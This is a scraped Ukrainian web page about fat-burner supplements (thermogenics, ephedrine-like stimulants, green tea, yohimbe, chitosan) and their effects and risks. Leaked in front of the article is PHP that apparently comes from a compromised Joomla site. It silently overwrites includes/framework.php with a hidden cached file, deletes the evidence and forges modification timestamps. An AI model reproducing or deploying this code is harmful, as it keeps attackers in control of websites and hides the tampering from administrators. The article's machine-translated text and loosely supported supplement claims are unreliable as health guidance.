$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Жироспалювачі. Ефективні жироспалювачі. Як швидко схуднути. Термогенеки | Спортивне харчування - успіх у бодібілдингу та пауерліфтингу

Жироспалювачі. Ефективні жироспалювачі. Як швидко схуднути. Термогенеки

Жироспалювачами називаються препарати, які призначені для рятування від зайвої підшкірної жирової клітковини. При застосуванні препаратів даної категорії не варто очікувати миттєвого ефекту й сподіватися, що жир буде спалюватися сам собою. Помітний результат буде гарантований тільки у випадку дотримання двох основних умов: дотримуватися раціонального харчування й регулярно виконувати фізичні вправи.

Жироспалювачі
виявляють відразу кілька видів дії на організм, допомагаючи скинути зайву вагу, активізуючи обмінні процеси в організмі й сприяючи швидкому розщепленню жирів, контролюючи апетит і приводячи його в норму. Також жироспалювачі підвищують енергетичні витрати організму, збільшуючи й прискорюючи витрату калорій. До складу таких препаратів входять як рослинні, так і хімічні компоненти, які виводять зайву рідину з організму, роблять м'яза рельефнее, зв'язують жир, сприяють його виведенню, і перешкоджають нагромадженню жирової тканини надалі .
До складу жироспалювачів входять такі компоненти як йохимбе, екстракт зеленого чаю, бромелайн, гарцинія камбоджійська, хитозан, екстракт гуараны, L- Карнитин і багато інші. Залежно від дії складових даних препаратів, при прийманні жиросжигателей можна добитися того або іншого ефекту.

ЖироспалювачіЖироспалювачі, основою яких є термогенні комплекси, значно підсилюють процеси розщеплення підшкірно-жирової клітковини, прискорюють метаболізм і ліпідний обмін. Основою термогенних препаратів з кофеїну, эфедрина й подібних його речовин, гидроксилимонной кислоти, холіну, L- карнитина, гуггулстерола, інозитола.

Ефедриноподібні речовини стимулюють центральну нервову систему й значно підвищують обмінні процеси. Але не варто забувати, що термогеники з обережністю слід ухвалювати людям, у яких є проблеми із щитовидною залозою, серцево-судинною системою, шлунково-кишковим трактом. Украй небажане й навіть небезпечно ухвалювати даний вид препаратів людям, що мають такі захворювання як:  гіпертонія й цукровий діабет, адже їх вплив на організм полягає й у підвищенні артеріального тиску, температури тіла. Люди, які намагаються схуднути за допомогою жироспалювачів, відзначають не тільки зниження апетиту, але й підвищення працездатності й витривалості організму. Усе це приводить, що худнуть у стан ейфорії, незважаючи на те, що дія цих препаратів має й зворотну сторону. При недотриманні дозування препаратів, що мають у своєму складі ефедриноподібні речовини, може спостерігатися ефект звикання. Через цей фахівці не тільки радять строго керуватися інструкції, але й робити регулярні перерви у використанні препаратів.

Жироспалювачі
на основі зеленого чаю, хитозана, екстрактів гарцинии і йохимбе виявляють на організм менш виражений ефект чому термогенні комплекси, але й шкоди від них менше. Навпаки, такі препарати приносять додаткову користь і не тільки знижують апетит і стимулюють обмін речовин, але й підвищують імунітет. Зелений чай є прекрасним природним антиоксидантом і допомагає організму боротися з вільними радикалами. Екстракт йохимбе впливає на роботу полової системи людину, збільшуючи приплив крові до органів малого таза. Екстракт гарцинии допомагає позбутися непереборного потяга до солодкого й несе організму додатковий заряд бадьорості. Хитозан поліпшує роботу печінки.

Не варто забувати, що приймання деяких жироспалювачів рекомендується тільки після консультації з терапевтом, ендокринологом і кардіологом, оскільки приймання таких препаратів, при тих або інших наявних захворюваннях, часто прискорює плин патологічних процесів. До того ж наявність зайвої ваги може свідчити про наявні неполадки в роботі щитовидної залози або гормональних порушеннях і спроба схуднути за допомогою жиросжигателей не тільки не виправдана, але й не принесе успіху доти , поки не будуть усунуті проблеми зі здоров'ям.

 

Джерело : "Женский журнал Beautynet - красота, мода, здоровье"

 
Бодібілдінг Жироспалювачі. Ефективні жироспалювачі. Як швидко схуднути. Термогенеки